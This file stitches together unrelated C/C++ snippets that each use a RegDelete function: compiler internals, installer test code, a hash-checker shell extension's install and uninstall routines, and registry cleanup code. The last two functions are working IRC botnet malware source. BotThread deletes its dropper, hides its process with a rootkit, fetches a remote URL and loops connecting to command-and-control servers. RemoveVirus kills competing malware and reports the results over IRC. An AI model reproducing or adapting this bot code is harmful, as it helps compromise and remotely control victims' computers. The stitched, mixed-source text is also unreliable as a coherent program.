static void RegDelete( score *sc, int index ) {
/*************************************************/
score *scoreboard;
int half;
list_head **free_heads;
scoreboard = &sc[ index ];
if( scoreboard->next_reg != scoreboard ) {
free_heads = (list_head **)&sc[ ScoreCount ];
scoreboard->list = *free_heads;
*free_heads = (list_head *)**free_heads;
*scoreboard->list = NULL;
}
scoreboard->prev_reg->next_reg = scoreboard->next_reg;
scoreboard->next_reg->prev_reg = scoreboard->prev_reg;
scoreboard->next_reg = scoreboard;
scoreboard->prev_reg = scoreboard;
scoreboard->generation = 0;
half = ScoreList[ index ]->low;
if( half != NO_INDEX ) {
RegDelete( sc, half );
}
half = ScoreList[ index ]->high;
if( half != NO_INDEX ) {
RegDelete( sc, half );
}
}
void CfgTest::SetARP(LPCWSTR wzKeyName, LPCWSTR wzDisplayName, LPCWSTR wzInstallLocation, LPCWSTR wzUninstallString)
{
HRESULT hr = S_OK;
HKEY hkArp = NULL;
HKEY hkNew = NULL;
hr = RegOpen(HKEY_CURRENT_USER, ARP_REG_KEY, KEY_WOW64_32KEY | KEY_ALL_ACCESS, &hkArp);
ExitOnFailure1(hr, "Failed to open fake ARP regkey: %ls", ARP_REG_KEY);
hr = RegDelete(hkArp, wzKeyName, REG_KEY_32BIT, TRUE);
if (E_FILENOTFOUND == hr)
{
hr = S_OK;
}
ExitOnFailure1(hr, "Failed to delete subkey: %ls", wzKeyName);
if (NULL != wzDisplayName)
{
hr = RegCreate(hkArp, wzKeyName, KEY_WOW64_32KEY | KEY_ALL_ACCESS, &hkNew);
ExitOnFailure1(hr, "Failed to create subkey: %ls", wzKeyName);
hr = RegWriteString(hkNew, L"DisplayName", wzDisplayName);
ExitOnFailure(hr, "Failed to write DisplayName to registry");
hr = RegWriteString(hkNew, L"UninstallString", wzUninstallString);
ExitOnFailure(hr, "Failed to write UninstallString to registry");
hr = RegWriteString(hkNew, L"InstallLocation", wzInstallLocation);
ExitOnFailure(hr, "Failed to write InstallLocation to registry");
}
LExit:
ReleaseRegKey(hkArp);
ReleaseRegKey(hkNew);
}
STDAPI DllUnregisterServer( )
{
HKEY hKey;
BOOL bClassRemoved = TRUE;
BOOL bApprovalRemoved = FALSE;
// Unregister class
if (!RegDelete(HKEY_CLASSES_ROOT, TEXT("CLSID\\%s"), CLSID_STR_HashCheck))
bClassRemoved = FALSE;
// Unregister handlers
if (!Wow64CheckProcess())
{
/**
* Registry reflection sucks; it means that if we try to unregister the
* Wow64 extension, we'll also unregister the Win64 extension; the API
* to disable reflection seems to only affect changes in value, not key
* removals. :( This hack will disable the deletion of certain HKCR
* keys in the case of 32-on-64, and it should be pretty safe--unless
* the user had installed only the 32-bit extension without the 64-bit
* extension on Win64 (which should be a very rare scenario), there
* should be no undesirable effects to using this hack.
**/
if (!RegDelete(HKEY_CLASSES_ROOT, TEXT("AllFileSystemObjects\\ShellEx\\ContextMenuHandlers\\%s"), CLSNAME_STR_HashCheck))
bClassRemoved = FALSE;
if (!RegDelete(HKEY_CLASSES_ROOT, TEXT("AllFileSystemObjects\\ShellEx\\PropertySheetHandlers\\%s"), CLSNAME_STR_HashCheck))
bClassRemoved = FALSE;
if (!RegDelete(HKEY_CLASSES_ROOT, PROGID_STR_HashCheck, NULL))
bClassRemoved = FALSE;
}
// Unregister approval
if (hKey = RegOpen(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved"), NULL, FALSE))
{
LONG lResult = RegDeleteValue(hKey, CLSID_STR_HashCheck);
bApprovalRemoved = (lResult == ERROR_SUCCESS || lResult == ERROR_FILE_NOT_FOUND);
RegCloseKey(hKey);
}
if (!bClassRemoved) return(SELFREG_E_CLASS);
if (!bApprovalRemoved) return(S_FALSE);
return(S_OK);
}
void CfgTest::TestInitialize()
{
HRESULT hr = S_OK;
HKEY hk = NULL;
hr = RegInitialize();
ExitOnFailure(hr, "Failed to initialize regutil");
// Override Arp regkey path
hr = RegDelete(HKEY_CURRENT_USER, ARP_REG_KEY, REG_KEY_32BIT, TRUE);
if (E_FILENOTFOUND == hr)
{
hr = S_OK;
}
ExitOnFailure1(hr, "Failed to delete fake ARP regkey: %ls", ARP_REG_KEY);
hr = RegCreate(HKEY_CURRENT_USER, ARP_REG_KEY, REG_KEY_32BIT, &hk);
ExitOnFailure1(hr, "Failed to create fake ARP regkey: %ls", ARP_REG_KEY);
hr = TestHookOverrideArpPath(ARP_REG_KEY);
ExitOnFailure(hr, "Failed to override ARP path for test");
// Override Applications regkey path
hr = RegDelete(HKEY_CURRENT_USER, APPLICATIONS_REG_KEY, REG_KEY_32BIT, TRUE);
if (E_FILENOTFOUND == hr)
{
hr = S_OK;
}
ExitOnFailure1(hr, "Failed to delete fake Applications regkey: %ls", APPLICATIONS_REG_KEY);
hr = RegCreate(HKEY_CURRENT_USER, APPLICATIONS_REG_KEY, REG_KEY_32BIT, &hk);
ExitOnFailure1(hr, "Failed to create fake Applications regkey: %ls", APPLICATIONS_REG_KEY);
hr = TestHookOverrideApplicationsPath(APPLICATIONS_REG_KEY);
ExitOnFailure(hr, "Failed to override Applications path for test");
RedirectDatabases();
LExit:
ReleaseRegKey(hk);
}
void CfgTest::TestUninitialize()
{
HRESULT hr = S_OK;
hr = RegDelete(HKEY_CURRENT_USER, ARP_REG_KEY, REG_KEY_32BIT, TRUE);
if (E_FILENOTFOUND == hr)
{
hr = S_OK;
}
ExitOnFailure1(hr, "Failed to delete fake ARP regkey: %ls", ARP_REG_KEY);
hr = RegDelete(HKEY_CURRENT_USER, APPLICATIONS_REG_KEY, REG_KEY_32BIT, TRUE);
if (E_FILENOTFOUND == hr)
{
hr = S_OK;
}
ExitOnFailure1(hr, "Failed to delete fake Applications regkey: %ls", APPLICATIONS_REG_KEY);
LExit:
return;
}
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name)
{
HKEY key=NULL;
if (!subkey)
return FALSE;
if (!name)
{
if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS)
return TRUE;
DWORD inx = 0;
DWORD chr = 256;
char buf[256] = {0};
FILETIME ftm;
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm);
while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) {
RegDelete(root,subkey,buf);
cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm);
}
fRegDeleteKey(key,subkey);
}
}
else
{
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
if (fRegDeleteValue(key,name) == ERROR_SUCCESS)
{
fRegCloseKey(key);
return TRUE;
}
fRegCloseKey(key);
}
}
return FALSE;
}
/********************************************************************
RegDelete - deletes a registry key (and optionally it's whole tree).
*********************************************************************/
extern "C" HRESULT DAPI RegDelete(
__in HKEY hkRoot,
__in_z LPCWSTR wzSubKey,
__in REG_KEY_BITNESS kbKeyBitness,
__in BOOL fDeleteTree
)
{
HRESULT hr = S_OK;
DWORD er = ERROR_SUCCESS;
LPWSTR pszEnumeratedSubKey = NULL;
LPWSTR pszRecursiveSubKey = NULL;
HKEY hkKey = NULL;
REGSAM samDesired = 0;
if (fDeleteTree)
{
hr = RegOpen(hkRoot, wzSubKey, KEY_READ, &hkKey);
if (E_FILENOTFOUND == hr)
{
ExitFunction1(hr = S_OK);
}
ExitOnFailure1(hr, "Failed to open this key for enumerating subkeys", wzSubKey);
// Yes, keep enumerating the 0th item, because we're deleting it every time
while (E_NOMOREITEMS != (hr = RegKeyEnum(hkKey, 0, &pszEnumeratedSubKey)))
{
ExitOnFailure(hr, "Failed to enumerate key 0");
hr = PathConcat(wzSubKey, pszEnumeratedSubKey, &pszRecursiveSubKey);
ExitOnFailure2(hr, "Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls", wzSubKey, pszEnumeratedSubKey);
hr = RegDelete(hkRoot, pszRecursiveSubKey, kbKeyBitness, fDeleteTree);
ExitOnFailure1(hr, "Failed to recursively delete subkey: %ls", pszRecursiveSubKey);
}
hr = S_OK;
}
if (!vfRegInitialized && REG_KEY_DEFAULT != kbKeyBitness)
{
hr = E_INVALIDARG;
ExitOnFailure(hr, "RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!");
}
switch (kbKeyBitness)
{
case REG_KEY_32BIT:
samDesired = KEY_WOW64_32KEY;
break;
case REG_KEY_64BIT:
samDesired = KEY_WOW64_64KEY;
break;
case REG_KEY_DEFAULT:
// Nothing to do
break;
}
if (NULL != vpfnRegDeleteKeyExW)
{
er = vpfnRegDeleteKeyExW(hkRoot, wzSubKey, samDesired, 0);
if (E_FILENOTFOUND == HRESULT_FROM_WIN32(er))
{
ExitFunction1(hr = E_FILENOTFOUND);
}
ExitOnWin32Error(er, hr, "Failed to delete registry key (ex).");
}
else
{
er = vpfnRegDeleteKeyW(hkRoot, wzSubKey);
if (E_FILENOTFOUND == HRESULT_FROM_WIN32(er))
{
ExitFunction1(hr = E_FILENOTFOUND);
}
ExitOnWin32Error(er, hr, "Failed to delete registry key.");
}
LExit:
ReleaseRegKey(hkKey);
ReleaseStr(pszEnumeratedSubKey);
ReleaseStr(pszRecursiveSubKey);
return hr;
}
HRESULT Uninstall( )
{
HRESULT hr = S_OK;
TCHAR szCurrentDllPath[MAX_PATH << 1];
TCHAR szTemp[MAX_PATH << 1];
LPTSTR lpszFileToDelete = szCurrentDllPath;
LPTSTR lpszTempAppend = szTemp + GetModuleFileName(g_hModThisDll, szTemp, countof(szTemp));
StringCbCopy(szCurrentDllPath, sizeof(szCurrentDllPath), szTemp);
#ifdef _WIN64
// If this 64-bit dll was installed to the default location,
// uninstall the 32-bit dll if it exists in its default location
TCHAR lpszDefInstallPath[MAX_PATH + 0x20];
UINT uSize = GetSystemDirectory(lpszDefInstallPath, MAX_PATH);
if (uSize && uSize < MAX_PATH)
{
LPTSTR lpszPathAppend = lpszDefInstallPath + uSize;
if (*(lpszPathAppend - 1) != TEXT('\\'))
*lpszPathAppend++ = TEXT('\\');
static const TCHAR szFolderAndFilename[] = TEXT("ShellExt") TEXT("\\") TEXT(HASHCHECK_FILENAME_STR);
SSStaticCpy(lpszPathAppend, szFolderAndFilename);
// If this 64-bit dll was installed to the default location
if (StrCmpI(szCurrentDllPath, lpszDefInstallPath) == 0)
{
TCHAR lpszSystemWow64[MAX_PATH + 0x20];
uSize = GetSystemWow64Directory(lpszSystemWow64, MAX_PATH);
if (uSize && uSize < MAX_PATH)
{
LPTSTR lpszSystemWow64Append = lpszSystemWow64 + uSize;
if (*(lpszSystemWow64Append - 1) != TEXT('\\'))
SSCpy2Ch(lpszSystemWow64Append++, TEXT('\\'), 0);
StringCbCopyEx(lpszDefInstallPath, sizeof(lpszDefInstallPath), lpszSystemWow64, &lpszPathAppend, NULL, 0);
SSStaticCpy(lpszPathAppend, szFolderAndFilename);
// If the 32-bit dll exists in its default location
if (PathFileExists(lpszDefInstallPath))
{
static const TCHAR szRegsvr32[] = TEXT("regsvr32.exe");
SSStaticCpy(lpszSystemWow64Append, szRegsvr32);
// the lpszSystemWow64 buffer now contains the full regsvr32.exe path
TCHAR lpszCommandLine[MAX_PATH + 0x20];
LPTSTR lpszCommandLineAppend;
static const TCHAR szCommandOpts[] = TEXT("regsvr32.exe /u /i /n /s ");
lpszCommandLineAppend = SSStaticCpy(lpszCommandLine, szCommandOpts) - 1;
StringCbCopy(lpszCommandLineAppend, sizeof(lpszCommandLine)-sizeof(szCommandOpts), lpszDefInstallPath);
STARTUPINFO si;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(pi));
if (!CreateProcess(lpszSystemWow64, lpszCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
return E_FAIL;
DWORD dwExit;
WaitForSingleObject(pi.hProcess, INFINITE);
GetExitCodeProcess(pi.hProcess, &dwExit);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
if (dwExit != 0)
return E_FAIL;
}
}
}
}
#endif
// Rename the DLL prior to scheduling it for deletion
*lpszTempAppend++ = TEXT('.');
SSCpy2Ch(lpszTempAppend, 0, 0);
for (TCHAR ch = TEXT('0'); ch <= TEXT('9'); ++ch)
{
*lpszTempAppend = ch;
if (MoveFileEx(szCurrentDllPath, szTemp, MOVEFILE_REPLACE_EXISTING))
{
lpszFileToDelete = szTemp;
break;
}
}
// Schedule the DLL to be deleted at shutdown/reboot
if (!MoveFileEx(lpszFileToDelete, NULL, MOVEFILE_DELAY_UNTIL_REBOOT)) hr = E_FAIL;
// Unregister
if (DllUnregisterServer() != S_OK) hr = E_FAIL;
// Disassociate file extensions; see the comment in DllUnregisterServer for
// why this step is skipped for Wow64 processes
if (!Wow64CheckProcess())
{
for (UINT i = 0; i < countof(g_szHashExtsTab); ++i)
{
HKEY hKey;
if (hKey = RegOpen(HKEY_CLASSES_ROOT, g_szHashExtsTab[i], NULL, FALSE))
{
RegGetSZ(hKey, NULL, szTemp, sizeof(szTemp));
if (_tcscmp(szTemp, PROGID_STR_HashCheck) == 0)
RegDeleteValue(hKey, NULL);
RegCloseKey(hKey);
}
}
}
// We don't need the uninstall strings any more...
RegDelete(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\%s"), CLSNAME_STR_HashCheck);
return(hr);
}
HRESULT Install( BOOL bRegisterUninstaller, BOOL bCopyFile )
{
TCHAR szCurrentDllPath[MAX_PATH << 1];
GetModuleFileName(g_hModThisDll, szCurrentDllPath, countof(szCurrentDllPath));
TCHAR szSysDir[MAX_PATH + 0x20];
UINT uSize = GetSystemDirectory(szSysDir, MAX_PATH);
if (uSize && uSize < MAX_PATH)
{
LPTSTR lpszPath = szSysDir;
LPTSTR lpszPathAppend = lpszPath + uSize;
if (*(lpszPathAppend - 1) != TEXT('\\'))
*lpszPathAppend++ = TEXT('\\');
LPTSTR lpszTargetPath = (bCopyFile) ? lpszPath : szCurrentDllPath;
if ( (!bCopyFile || InstallFile(szCurrentDllPath, lpszTargetPath, lpszPathAppend)) &&
DllRegisterServerEx(lpszTargetPath) == S_OK )
{
HKEY hKey, hKeySub;
// Associate file extensions
for (UINT i = 0; i < countof(g_szHashExtsTab); ++i)
{
if (hKey = RegOpen(HKEY_CLASSES_ROOT, g_szHashExtsTab[i], NULL, TRUE))
{
RegSetSZ(hKey, NULL, PROGID_STR_HashCheck);
RegSetSZ(hKey, TEXT("PerceivedType"), TEXT("text"));
if (hKeySub = RegOpen(hKey, TEXT("PersistentHandler"), NULL, TRUE))
{
RegSetSZ(hKeySub, NULL, TEXT("{5e941d80-bf96-11cd-b579-08002b30bfeb}"));
RegCloseKey(hKeySub);
}
RegCloseKey(hKey);
}
}
// Disassociate former file extensions; see the comment in DllUnregisterServer for
// why this step is skipped for Wow64 processes
if (!Wow64CheckProcess())
{
for (UINT i = 0; i < countof(szFormerHashExtsTab); ++i)
{
HKEY hKey;
if (hKey = RegOpen(HKEY_CLASSES_ROOT, szFormerHashExtsTab[i], NULL, FALSE))
{
TCHAR szTemp[countof(PROGID_STR_HashCheck)];
RegGetSZ(hKey, NULL, szTemp, sizeof(szTemp));
if (_tcscmp(szTemp, PROGID_STR_HashCheck) == 0)
RegDeleteValue(hKey, NULL);
RegCloseKey(hKey);
}
}
}
// Uninstaller entries
RegDelete(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\%s"), CLSNAME_STR_HashCheck);
if (bRegisterUninstaller && (hKey = RegOpen(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\%s"), CLSNAME_STR_HashCheck, TRUE)))
{
TCHAR szUninstall[MAX_PATH << 1];
StringCchPrintf(szUninstall, countof(szUninstall), TEXT("regsvr32.exe /u /i /n \"%s\""), lpszTargetPath);
static const TCHAR szURLFull[] = TEXT("https://github.com/gurnec/HashCheck/issues");
TCHAR szURLBase[countof(szURLFull)];
SSStaticCpy(szURLBase, szURLFull);
szURLBase[35] = 0; // strlen("https://github.com/gurnec/HashCheck")
RegSetSZ(hKey, TEXT("DisplayIcon"), lpszTargetPath);
RegSetSZ(hKey, TEXT("DisplayName"), TEXT(HASHCHECK_NAME_STR));
RegSetSZ(hKey, TEXT("DisplayVersion"), TEXT(HASHCHECK_VERSION_STR));
RegSetDW(hKey, TEXT("EstimatedSize"), 1073);
RegSetSZ(hKey, TEXT("HelpLink"), szURLFull);
RegSetDW(hKey, TEXT("NoModify"), 1);
RegSetDW(hKey, TEXT("NoRepair"), 1);
RegSetSZ(hKey, TEXT("UninstallString"), szUninstall);
RegSetSZ(hKey, TEXT("URLInfoAbout"), szURLBase);
RegSetSZ(hKey, TEXT("URLUpdateInfo"), TEXT("https://github.com/gurnec/HashCheck/releases/latest"));
RegCloseKey(hKey);
}
return(S_OK);
} // if copied & registered
} // if valid sysdir
return(E_FAIL);
}
static HRESULT DeleteEmptyRegistryKeys(
__in LEGACY_SYNC_PRODUCT_SESSION *pSyncProductSession
)
{
HRESULT hr = S_OK;
const LEGACY_REGISTRY_KEY *rgRegKeys = pSyncProductSession->product.rgRegKeys;
const DWORD cRegKeys = pSyncProductSession->product.cRegKeys;
DWORD dwIndex = 0;
LPWSTR pwcLastBackslash = NULL;
LPWSTR sczParentKey = NULL;
for (DWORD i = 0; i < cRegKeys; ++i)
{
hr = DeleteEmptyRegistryKeyChildren(rgRegKeys[i].dwRoot, rgRegKeys[i].sczKey);
// This code is just an FYI that the key was not empty and so wasn't deleted. It's not an error, so ignore it.
if (HRESULT_FROM_WIN32(ERROR_DIR_NOT_EMPTY) == hr)
{
hr = S_OK;
continue;
}
ExitOnFailure(hr, "Failed to check for empty keys and delete them at root: %u, subkey: %ls", rgRegKeys[i].dwRoot, rgRegKeys[i].sczKey);
hr = StrAllocString(&sczParentKey, rgRegKeys[i].sczKey, 0);
ExitOnFailure(hr, "Failed to allocate copy of subkey");
// Eliminate any trailing backslashes from the key first, if there are any
dwIndex = lstrlenW(sczParentKey);
if (0 == dwIndex)
{
hr = E_INVALIDARG;
ExitOnFailure(hr, "Unexpected empty parent key encountered while deleting empty registry keys");
}
--dwIndex; // Start at the last character of the string
while (dwIndex > 0 && sczParentKey[dwIndex] == L'\\')
{
sczParentKey[dwIndex] = L'\0';
--dwIndex;
}
if (0 == dwIndex)
{
hr = E_INVALIDARG;
ExitOnFailure(hr, "Parent key was entirely composed of backslashes!");
}
// Now delete any empty parent keys we see as well
while (NULL != (pwcLastBackslash = wcsrchr(sczParentKey, L'\\')))
{
hr = RegDelete(ManifestConvertToRootKey(rgRegKeys[i].dwRoot), sczParentKey, REG_KEY_DEFAULT, FALSE);
// This code is just an FYI that the key was not empty and so wasn't deleted. It's not an error, so ignore it.
if (FAILED(hr))
{
LogErrorString(hr, "Failed to check for empty parent keys and delete them at root: %u, subkey: %ls", rgRegKeys[i].dwRoot, sczParentKey);
hr = S_OK;
break;
}
*pwcLastBackslash = L'\0';
}
}
LExit:
ReleaseStr(sczParentKey);
return hr;
}
static HRESULT DeleteEmptyRegistryKeyChildren(
__in DWORD dwRoot,
__in_z LPCWSTR wzSubKey
)
{
HRESULT hr = S_OK;
HKEY hkKey = NULL;
DWORD dwIndex = 0;
BOOL fNoValues = FALSE;
LPWSTR sczValueName = NULL;
LPWSTR sczSubkeyName = NULL;
LPWSTR sczSubkeyPath = NULL;
DWORD dwSubKeyPathLen = 0;
hr = RegOpen(ManifestConvertToRootKey(dwRoot), wzSubKey, KEY_READ, &hkKey);
if (E_FILENOTFOUND == hr)
{
ExitFunction1(hr = S_OK);
}
ExitOnFailure(hr, "Failed to open regkey: %ls", wzSubKey);
if (E_NOMOREITEMS == RegValueEnum(hkKey, dwIndex, &sczValueName, NULL))
{
fNoValues = TRUE;
}
// Recurse and handle subkeys as well
dwIndex = 0;
while (E_NOMOREITEMS != (hr = RegKeyEnum(hkKey, dwIndex, &sczSubkeyName)))
{
ExitOnFailure(hr, "Failed to enumerate key %u", dwIndex);
hr = StrAllocString(&sczSubkeyPath, wzSubKey, 0);
ExitOnFailure(hr, "Failed to allocate copy of subkey name");
dwSubKeyPathLen = lstrlenW(sczSubkeyPath);
if (0 == dwSubKeyPathLen)
{
hr = E_INVALIDARG;
ExitOnFailure(hr, "Encountered empty keyname while enumerating subkeys under key: %ls", wzSubKey);
}
else if (L'\\' != sczSubkeyPath[dwSubKeyPathLen - 1])
{
hr = StrAllocConcat(&sczSubkeyPath, L"\\", 1);
ExitOnFailure(hr, "Failed to concatenate backslash to copy of regkey name");
}
hr = StrAllocConcat(&sczSubkeyPath, sczSubkeyName, 0);
ExitOnFailure(hr, "Failed to concatenate subkey name to subkey path");
hr = DeleteEmptyRegistryKeyChildren(dwRoot, sczSubkeyPath);
// Increment and ignore the error if we didn't delete the subkey
if (HRESULT_FROM_WIN32(ERROR_DIR_NOT_EMPTY) == hr)
{
++dwIndex;
hr = S_OK;
}
ExitOnFailure(hr, "Failed to read regkey and write settings for root: %u, subkey: %ls", dwRoot, sczSubkeyPath);
}
// If there are no keys and no values under it, delete it
if (fNoValues && 0 == dwIndex)
{
hr = RegDelete(ManifestConvertToRootKey(dwRoot), wzSubKey, REG_KEY_DEFAULT, FALSE);
ExitOnFailure(hr, "Failed to delete registry key at root: %u, subkey: %ls", dwRoot, wzSubKey);
ExitFunction1(hr = S_OK);
}
else
{
ExitFunction1(hr = HRESULT_FROM_WIN32(ERROR_DIR_NOT_EMPTY));
}
LExit:
ReleaseRegKey(hkKey);
ReleaseStr(sczValueName);
ReleaseStr(sczSubkeyName);
ReleaseStr(sczSubkeyPath);
return hr;
}
DWORD WINAPI BotThread(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
Sleep(5000);
else
break;
}
// if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
// ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
#ifndef _DEBUG
#ifndef NO_MELT
char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
if (melt)
{
SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
int tries=0;
while (FileExists(melt) && tries<3)
{
DeleteFile(melt);
tries++;
Sleep(2000);
}
RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
}
#endif // NO_MELT
#endif // _DEBUG
srand(GetTickCount());
dwstarted=GetTickCount();
#ifndef NO_VERSION_REPLY
curversion=rand()%(versionsize);
#ifdef _DEBUG
printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
#ifndef _DEBUG
#ifndef NO_FCONNECT
char readbuf[1024];
HINTERNET httpopen, openurl;
DWORD read;
httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
if (!openurl)
{
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
}
fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG
#ifndef NO_INSTALLED_TIME
if (!noadvapi32)
GetInstalledTime();
else
sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
int i=0;
DWORD id=0;
#ifndef NO_RECORD_UPTIME
i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
NTHREAD secure;
secure.bdata2=TRUE;//loop
i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
#ifndef NO_RDRIV
#ifndef _DEBUG
rkenabled=InitRK();//initialize fu
if (rkenabled)
HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV
#ifndef _DEBUG // maybe this will give the shutdown handler time to work
RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
//get internal ip
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(servers[curserver].host,servers[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(serversize-1))
curserver=0;
else
curserver++;
}
// cleanup;
killthreadall();
fWSACleanup();
ReleaseMutex(mutex);
ExitThread(0);
}
void RemoveVirus(char *target,void *conn,BOOL loop,BOOL silent,BOOL verbose)
{
IRC* irc=(IRC*)conn;
char sysdir[MAX_PATH], virusexecutable[MAX_PATH];
int viriireg=0,viriikill=0,viriidel=0;
int viriifound=0;
int viriisize=(sizeof(viruses)/sizeof(VIRUSES));
for (unsigned int i=0; i<viriisize; i++)
{
char *treg=RegQuery(viruses[i].hkey,viruses[i].subkey,viruses[i].value);
if (treg)
{
viriifound++;
if (RegDelete(viruses[i].hkey,viruses[i].subkey,viruses[i].value))
{
viriireg++;
if (!loop && !silent && verbose)
irc->privmsg(target,"%s Removed registry key for virus: %s",sec_title,viruses[i].name);
}
#ifndef NO_PROCESS
if (KillProcess(viruses[i].file,0))
{
viriikill++;
if (!loop && !silent && verbose)
irc->privmsg(target,"%s Killed process for virus: %s",sec_title,viruses[i].name);
}
#endif
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecutable, "%s\\%s", sysdir, viruses[i].file);
if (DeleteFile(virusexecutable)!=0)
{
viriidel++;
if (!loop && !silent && verbose)
irc->privmsg(target,"%s Erased executable for virus: %s",sec_title,viruses[i].name);
}
}
else
{ // Just for the hell of it
/*if (KillProcess(viruses[i].file,0))
{
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecutable, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecutable);
}
Sleep(100);*/
}
}
if (viriifound==0)
{
if (!loop && !silent)
irc->privmsg(target,"%s No known viruses.",sec_title);
}
else
{
if (!loop && !silent)
irc->privmsg(target,"%s %s known viruses: R:%.2d, K:%.2d, D:%.2d",sec_title,viriifound,viriireg,viriikill,viriidel);
}
return;
}
